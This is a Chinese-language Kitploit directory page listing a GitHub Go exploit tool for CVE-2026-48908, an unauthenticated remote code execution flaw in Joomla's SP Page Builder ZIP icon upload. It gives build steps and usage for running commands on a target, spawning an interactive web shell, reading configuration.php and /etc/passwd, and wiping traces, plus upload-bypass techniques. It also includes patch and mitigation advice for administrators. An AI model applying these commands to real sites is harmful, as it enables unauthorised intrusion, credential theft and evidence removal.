Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-48908-SP-Page-Builder-Joomla — CVE-2026-48908 - SP Page Builder Joomla 未认证远程代码执行 | Kitploit
工具/GitHubGitHub/gagaltotal/cve-2026-48908-sp-page-builder-joomla
漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用后渗透利用渗透测试命令与控制红队Payload 开发

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
GitHubgagaltotal/cve-2026-48908-sp-page-builder-joomla

CVE-2026-48908-SP-Page-Builder-Joomla

CVE-2026-48908 - SP Page Builder Joomla 未认证远程代码执行

查看仓库
22个月前尚未审核
分享

CVE-2026-48908: SP Page Builder Joomla 未授权远程代码执行

CVE-2026-48908 漏洞的利用验证(PoC)代码,针对 Joomla SP Page Builder 组件的未授权远程代码执行漏洞。

漏洞概述

CVE-2026-48908 是一个严重安全漏洞,允许未授权的攻击者在易受攻击的 Joomla 安装上通过 SP Page Builder 组件对 ZIP 文件提取的处理不当来执行任意代码。

技术细节

  • CVE ID: CVE-2026-48908
  • 组件: com_sppagebuilder
  • 受影响版本: <= 6.6.1
  • 修复版本: 6.6.2
  • 攻击向量: 基于网络,无需认证
  • CVSS 评分: 严重
  • 漏洞类型: 任意文件上传 / ZIP 解压 RCE
  • 攻击端点: index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon

根本原因

该漏洞存在于资产上传功能中,应用程序在对包含图标资产的 ZIP 文件进行验证和提取时存在缺陷。攻击者可以构造一个包含 PHP 载荷的恶意 ZIP 文件,该文件将被解压到 Web 可访问目录,从而实现远程代码执行。

环境要求

  • Go 1.26.4 或更高版本
  • 能够网络访问目标 Joomla 安装
  • 有效的目标 URL

依赖项

  • golang.org/x/term - 用于安全密码输入的终端工具

安装

从源码编译

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go

预编译二进制文件

编译好的二进制文件可在发布页面获取。

使用方法

屏幕截图

基本命令执行

屏幕截图

root@kitploit:~
./poc_tot -target http://target-site.com -cmd "whoami"

交互式 Shell

root@kitploit:~
./poc_tot -target http://target-site.com -shell

漏洞评估

root@kitploit:~
./poc_tot -target http://target-site.com -check

清理

root@kitploit:~
./poc_tot -target http://target-site.com -cleanup

使用自定义令牌(如果可用)

root@kitploit:~
./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"

命令行选项

root@kitploit:~
-target string
    易受攻击的 Joomla 安装的目标 URL(必需)
    示例:http://target.com 或 https://target.com

-cmd string
    在目标上执行的系统命令
    示例:"cat /etc/passwd"

-shell
    在目标上启动交互式 shell(需要成功利用)

-check
    检查目标是否易受攻击,而不尝试利用

-cleanup
    从目标中移除上传的 shell 和残留文件

-token string
    用于利用的 CSRF 令牌(可选,如果未提供则自动检测)

利用方法

该工具支持多种利用向量:

  1. 直接 PHP 上传 - 将 PHP 文件直接上传到可执行路径
  2. 目录遍历 - 使用路径遍历绕过限制
  3. 归档操纵 - 构造带有嵌入式载荷的恶意 ZIP 归档文件
  4. 扩展名欺骗 - 使用双重扩展名和大小写变体

示例

侦察

root@kitploit:~
./poc_tot -target http://vulnerable.local -check

执行单个命令

root@kitploit:~
./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"

获取敏感文件

root@kitploit:~
./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"

交互式访问

root@kitploit:~
./poc_tot -target http://vulnerable.local -shell
# 在 shell 中:
> id
> whoami
> pwd

清理痕迹

root@kitploit:~
./poc_tot -target http://vulnerable.local -cleanup

安全考量

对于管理员

如果您正在运行带有 SP Page Builder 组件的 Joomla:

  1. 立即更新: 升级到 SP Page Builder 6.6.2 或更高版本
  2. 禁用组件: 如果无法立即更新,请禁用 com_sppagebuilder
  3. 监控日志: 检查 Web 服务器日志中是否有可疑活动
  4. 限制权限: 确保 Web 目录具有适当的文件权限
  5. Web 应用防火墙: 部署 WAF 规则以阻止利用尝试

对于安全研究人员

  • 仅在您拥有或已获得明确授权测试的系统上使用此工具
  • 先在隔离环境中测试
  • 适当记录所有发现
  • 遵循负责任的披露实践
  • 请勿用于未经授权的访问

免责声明

本软件仅供教育和授权的安全测试用途。未经授权访问计算机系统是非法的。作者不对因使用此工具造成的误用或损害承担责任。用户有责任确保在使用此工具于任何目标系统之前获得适当的授权。

使用此工具即表示您确认:

  • 您将仅将其用于您拥有或已获得书面授权测试的系统
  • 您了解法律后果并承担全部责任
  • 作者不对任何损害或法律后果负责
  • 您将遵守所有适用的法律法规

法律声明

此工具仅用于防御性安全研究和授权的渗透测试。未经授权访问计算机系统违反《计算机欺诈与滥用法》及其他司法管辖区的类似法律。在进行安全测试之前,务必以书面形式获得适当的授权。

参考资源

  • Joomla 官方安全中心:https://docs.joomla.org/Security_Checklist
  • SP Page Builder:https://www.sp-components.com/
  • CVE-2026-48908 详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48908

缓解措施

立即行动

  1. 应用安全更新至 6.6.2 或更高版本
  2. 如果无法更新,禁用组件:index.php?option=com_installer&view=manage
  3. 检查错误日志中是否存在利用尝试
  4. 审查文件系统中 media 目录下是否有可疑的 PHP 文件

长期安全

  1. 保持 Joomla 及所有组件更新
  2. 实施自动化安全扫描
  3. 使用安全标头和 WAF 规则
  4. 监控文件完整性
  5. 保持定期备份
  6. 实施最小权限原则

贡献

欢迎安全研究人员参与贡献。请:

  1. 负责任地报告漏洞
  2. 遵循现有代码风格
  3. 包含详细的文档
  4. 提交前充分测试

作者

GhostGTR666 (Gagaltotal666)

  • GitHub:https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
  • 邮箱:通过 GitHub 联系

更新日志

版本 1.0.0

  • 初始版本
  • 支持多种利用向量
  • 交互式 Shell 功能
  • 漏洞检查与清理操作

支持

如有问题、疑问或贡献:

  1. 检查已有的 GitHub Issue
  2. 查看错误消息和日志
  3. 确保目标 URL 正确且可访问
  4. 测试前验证适当授权

许可证

本项目按原样提供,仅供安全研究使用。请查阅当地关于安全工具和渗透测试的法律法规。


最后更新: 2026-06-24

免责声明: 此工具仅供授权的安全测试使用。未经授权访问计算机系统是非法的。

下载工具